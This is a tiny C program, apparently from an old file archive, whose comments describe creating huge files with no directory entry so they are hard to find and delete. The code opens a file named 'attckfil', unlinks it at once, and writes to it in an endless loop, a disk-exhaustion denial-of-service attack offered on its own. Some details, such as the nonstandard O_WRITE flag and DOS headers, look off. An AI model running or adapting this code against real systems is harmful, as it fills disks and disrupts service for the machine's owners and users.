home *** CD-ROM | disk | FTP | other *** search
- /* Creates massive files with no Inode info, making deletion difficult */
- /* The files do not appear under du or ls b/c they have no dir entries */
- #include <io.h>
- #include <stdio.h>
- #include <process.h>
-
- void main(){int ifd;char buf[8192];ifd=open("./attckfil",O_WRITE|O_CREAT,0777);
- unlink("./attckfil");while(1)write(ifd,buf,sizeof(buf));}
-